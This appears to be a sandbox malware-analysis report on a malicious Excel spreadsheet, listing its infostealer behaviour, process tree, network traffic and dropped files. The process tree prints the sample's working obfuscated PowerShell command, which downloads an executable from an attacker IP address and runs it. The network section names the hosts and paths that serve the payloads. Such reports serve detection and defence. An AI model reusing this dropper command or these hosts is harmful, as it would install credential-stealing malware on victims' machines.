Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 01:21 UTC
Static task
static1
Behavioral task
behavioral1
Sample
56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb.xls
Resource
win10v2004-20240704-en
General
-
Target
56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb.xls
-
Size
196KB
-
MD5
94c41969a6a283de0b8b9ec94e31b700
-
SHA1
484cb7930443fc984ccf0c17a7012f95fc5ab4d2
-
SHA256
56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb
-
SHA512
0dee183e7e54a2b348c1c6eaf42c7173b8b5fa4e8fe58355225e9ea15e8a476dbb5617ff896f008d2faeccc87c3463080b2f4007e5d507cad4e535d36a8b043e
-
SSDEEP
6144:gBxfR5+MWzqukoSd1X2yc47zo+rFQoPKBDBtp:gBhRAr0ncoKp
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 8 2156 mshta.exe 9 2156 mshta.exe 11 1372 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 1844 igcc.exe 3404 igcc.exe 3424 igcc.exe 3440 igcc.exe 3460 igcc.exe 3484 igcc.exe 3396 igcc.exe 3412 igcc.exe 3432 igcc.exe 3452 igcc.exe 3468 igcc.exe -
Loads dropped DLL 1 IoCs
pid Process 1372 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook igcc.exe Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook igcc.exe Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook igcc.exe Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook igcc.exe Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook igcc.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vtxjlwrr = "C:\\Users\\Admin\\AppData\\Roaming\\Vtxjlwrr.exe" igcc.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1844 set thread context of 3484 1844 igcc.exe 49 -
Detected phishing page
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2104 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 1372 powershell.exe 1372 powershell.exe 1372 powershell.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 1844 igcc.exe 3484 igcc.exe 3484 igcc.exe 3484 igcc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1844 igcc.exe Token: SeDebugPrivilege 1844 igcc.exe Token: SeDebugPrivilege 3484 igcc.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2104 EXCEL.EXE 2104 EXCEL.EXE 2104 EXCEL.EXE 2104 EXCEL.EXE 2104 EXCEL.EXE -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2156 wrote to memory of 2628 2156 mshta.exe 33 PID 2156 wrote to memory of 2628 2156 mshta.exe 33 PID 2156 wrote to memory of 2628 2156 mshta.exe 33 PID 2156 wrote to memory of 2628 2156 mshta.exe 33 PID 2628 wrote to memory of 1372 2628 cmd.exe 35 PID 2628 wrote to memory of 1372 2628 cmd.exe 35 PID 2628 wrote to memory of 1372 2628 cmd.exe 35 PID 2628 wrote to memory of 1372 2628 cmd.exe 35 PID 1372 wrote to memory of 2608 1372 powershell.exe 36 PID 1372 wrote to memory of 2608 1372 powershell.exe 36 PID 1372 wrote to memory of 2608 1372 powershell.exe 36 PID 1372 wrote to memory of 2608 1372 powershell.exe 36 PID 2608 wrote to memory of 2764 2608 csc.exe 37 PID 2608 wrote to memory of 2764 2608 csc.exe 37 PID 2608 wrote to memory of 2764 2608 csc.exe 37 PID 2608 wrote to memory of 2764 2608 csc.exe 37 PID 1372 wrote to memory of 1844 1372 powershell.exe 39 PID 1372 wrote to memory of 1844 1372 powershell.exe 39 PID 1372 wrote to memory of 1844 1372 powershell.exe 39 PID 1372 wrote to memory of 1844 1372 powershell.exe 39 PID 1844 wrote to memory of 3396 1844 igcc.exe 40 PID 1844 wrote to memory of 3396 1844 igcc.exe 40 PID 1844 wrote to memory of 3396 1844 igcc.exe 40 PID 1844 wrote to memory of 3404 1844 igcc.exe 41 PID 1844 wrote to memory of 3404 1844 igcc.exe 41 PID 1844 wrote to memory of 3404 1844 igcc.exe 41 PID 1844 wrote to memory of 3412 1844 igcc.exe 42 PID 1844 wrote to memory of 3412 1844 igcc.exe 42 PID 1844 wrote to memory of 3412 1844 igcc.exe 42 PID 1844 wrote to memory of 3424 1844 igcc.exe 43 PID 1844 wrote to memory of 3424 1844 igcc.exe 43 PID 1844 wrote to memory of 3424 1844 igcc.exe 43 PID 1844 wrote to memory of 3432 1844 igcc.exe 44 PID 1844 wrote to memory of 3432 1844 igcc.exe 44 PID 1844 wrote to memory of 3432 1844 igcc.exe 44 PID 1844 wrote to memory of 3440 1844 igcc.exe 45 PID 1844 wrote to memory of 3440 1844 igcc.exe 45 PID 1844 wrote to memory of 3440 1844 igcc.exe 45 PID 1844 wrote to memory of 3452 1844 igcc.exe 46 PID 1844 wrote to memory of 3452 1844 igcc.exe 46 PID 1844 wrote to memory of 3452 1844 igcc.exe 46 PID 1844 wrote to memory of 3460 1844 igcc.exe 47 PID 1844 wrote to memory of 3460 1844 igcc.exe 47 PID 1844 wrote to memory of 3460 1844 igcc.exe 47 PID 1844 wrote to memory of 3468 1844 igcc.exe 48 PID 1844 wrote to memory of 3468 1844 igcc.exe 48 PID 1844 wrote to memory of 3468 1844 igcc.exe 48 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 PID 1844 wrote to memory of 3484 1844 igcc.exe 49 -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 igcc.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2104
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c POWeRSHeLl.Exe -Ex bYPasS -NoP -w 1 -C DeviCecReDENtiaLDEploYMenT.Exe ; iEX($(ieX('[SySteM.tExT.eNcOdiNG]'+[CHar]0X3a+[Char]58+'uTF8.GetsTriNG([sYsteM.COnVERT]'+[CHAR]58+[CHAR]58+'fRoMBaSE64sTRINg('+[cHAR]34+'JDV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJFcmRlRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmR2LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2dLbFR3QktQUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9obFVVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtieHlNemwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJFUnJMU0dvaGJsRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZHSXFacFFFbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDV4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vODguOTkuMjQ2LjU1L1MwNzA3TS9sc2Fzcy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlRVAoMyk7U1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcaWdjYy5leGUi'+[CHaR]34+'))')))"2⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWeRSHeLl.Exe -Ex bYPasS -NoP -w 1 -C DeviCecReDENtiaLDEploYMenT.Exe ; iEX($(ieX('[SySteM.tExT.eNcOdiNG]'+[CHar]0X3a+[Char]58+'uTF8.GetsTriNG([sYsteM.COnVERT]'+[CHAR]58+[CHAR]58+'fRoMBaSE64sTRINg('+[cHAR]34+'JDV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJFcmRlRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmR2LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2dLbFR3QktQUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9obFVVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtieHlNemwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJFUnJMU0dvaGJsRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZHSXFacFFFbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDV4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vODguOTkuMjQ2LjU1L1MwNzA3TS9sc2Fzcy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlRVAoMyk7U1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcaWdjYy5leGUi'+[CHaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yyk-c2li.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD65.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDD64.tmp"5⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3396
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3404
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3412
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3424
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3432
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3440
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3452
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3460
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
PID:3468
-
-
C:\Users\Admin\AppData\Roaming\igcc.exe"C:\Users\Admin\AppData\Roaming\igcc.exe"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3484
-
-
-
-
Network
-
Remote address:8.8.8.8:53Requesthop.fyiIN AResponsehop.fyiIN A192.185.89.92
-
Remote address:192.185.89.92:80RequestGET /Liuuc HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: hop.fyi
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Cache-Control: no-cache, no-store, private
Expires: -1
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://88.99.246.55/xampp/ug/IEnetCache.hta
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 215
Keep-Alive: timeout=5, max=75
Content-Type: text/html; charset=UTF-8
-
Remote address:88.99.246.55:80RequestGET /xampp/ug/IEnetCache.hta HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Connection: Keep-Alive
Host: 88.99.246.55
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Sun, 07 Jul 2024 17:06:22 GMT
ETag: "19942-61cab50de91ef"
Accept-Ranges: bytes
Content-Length: 104770
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
-
Remote address:192.185.89.92:80RequestGET /Liuuc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: hop.fyi
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Cache-Control: no-cache, no-store, private
Expires: -1
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://88.99.246.55/xampp/ug/IEnetCache.hta
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 215
Keep-Alive: timeout=5, max=75
Content-Type: text/html; charset=UTF-8
-
Remote address:88.99.246.55:80RequestGET /xampp/ug/IEnetCache.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 88.99.246.55
Connection: Keep-Alive
Range: bytes=13299-
If-Range: "19942-61cab50de91ef"
ResponseHTTP/1.1 206 Partial Content
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Sun, 07 Jul 2024 17:06:22 GMT
ETag: "19942-61cab50de91ef"
Accept-Ranges: bytes
Content-Length: 91471
Content-Range: bytes 13299-104769/104770
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
-
Remote address:88.99.246.55:80RequestGET /S0707M/lsass.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 88.99.246.55
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Mon, 08 Jul 2024 21:32:52 GMT
ETag: "258c00-61cc327c9c900"
Accept-Ranges: bytes
Content-Length: 2460672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/lnk
-
587 B 807 B 6 4
HTTP Request
GET http://hop.fyi/LiuucHTTP Response
301 -
2.2kB 90.9kB 41 67
HTTP Request
GET http://88.99.246.55/xampp/ug/IEnetCache.htaHTTP Response
200 -
565 B 767 B 5 3
HTTP Request
GET http://hop.fyi/LiuucHTTP Response
301 -
2.2kB 94.6kB 38 69
HTTP Request
GET http://88.99.246.55/xampp/ug/IEnetCache.htaHTTP Response
206 -
53.1kB 2.5MB 1094 1817
HTTP Request
GET http://88.99.246.55/S0707M/lsass.exeHTTP Response
200 -
2.9kB 159.0kB 63 120
-
245.4kB 2.7kB 186 68
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\IEnetCache[1].hta
Filesize12KB
MD5c849d88a3cce69be07288d909e56b68f
SHA149c9032a05ca1cb3393ba131d3c23d23e8c04544
SHA2561b3bae8cdc663d747a703aecff3e14f55a4928f4197060bdc1ee57037dd118fd
SHA5123090bed8eaf2aa3b4c93d20430f4820ddc9f18f900f6311cecd35d38ad6465d57dc5b4114c9ad6f7e225ecff42b8331e6dff70d57aa158c0767737f8810aec2b
-
Filesize
1KB
MD51400189446584c917d1b373d3ef6f918
SHA16aec8cd139a2d7280ab59e8445f3565999ba4779
SHA2565cae546ec88e5aeece9a1f251b793e3c72c2180f3a62d3d82b8c6a499108126f
SHA512d8cead098bd0241c7e03b15d2c111454212204417370471cde14aabfb61361de6bfb50bd8b1755e631f9908fbc83fcc3c3198d84664aeaed182c13c168d07bf4
-
Filesize
92KB
MD5cf00cf5b059b43e29cbde1a36c6209f3
SHA19df2f8ef60997e3934fef0d88f9770fb9d19769f
SHA2569f861e6046979ac19a569747cd17b7e77a8e1301c870691595a68d9a8244a30a
SHA51216e433a67de26cbf052f2639df05c5d3d2c5ef5d4ef065b45af913174e08415bd6672f6637e8727e88b2e68c74c2ffeabc6673e1506e8ad397edb198e0276399
-
Filesize
148KB
MD590a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA2567cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2
-
Filesize
3KB
MD58424c46596c5d373a44a97a3e911f7fc
SHA19a9c7dca8cf9b177eef0e961100ef82474663e0e
SHA256a6f815e809cdc4983b869c95fc716299b6549e4bce3408c9d4d42d0289cc081b
SHA5124628c8a5d939e704f5afda8ec845f21a252c08928f72ab66081efc5520688119f675a7de40e248075739d08170b85bcf6bff35e7e0234598f205230aba7ba541
-
Filesize
7KB
MD58b29e9a7631bc2da59daacd8f613824e
SHA184319c827fac4d9c47fcefe088766cfe43a8475b
